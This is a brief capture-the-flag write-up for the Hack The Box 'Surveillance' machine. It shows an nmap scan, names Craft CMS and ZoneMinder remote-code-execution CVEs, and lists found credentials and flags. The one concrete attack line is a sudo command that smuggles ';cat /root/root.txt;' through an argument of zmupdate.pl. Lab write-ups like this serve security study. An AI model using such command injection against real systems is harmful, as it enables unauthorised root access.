Htb_surveillance

HTB surveillance

Writeup for htb surveillnace box

rated: medium category: web

Nmap Scan

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11


Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-28 14:38 EAT
Nmap scan report for 10.10.11.245
Host is up (0.30s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 59.76 seconds

A cms is running in port 80 , craft cms

It is vulnerable to rce CVE-2023-41892

There are 2 :

matthew
zoneminder

Further enumartion we get a backup file surveillance–2023-10-17-202801–v4.4.14.sql.zip. It has a sql backup of the database , here we get creds for the user matthew.

user.txt 260ecc03cedb8e78d80a6658b5b22eac

We also get the creda for zoneminder in the ZoneMinder config files password : ZoneMinderPassword2023

Zoneminder is a service running on port 8080, So we tunnel using ssh to access it.

It is vulnerable to rce CVE-2023-26035

To escalate priviledges and read root flag

1

sudo /usr/bin/zmupdate.pl -v 1.19.0 -u ";cat /root/root.txt;"

root.txt 13630834b0c9c6f122557097788d8e25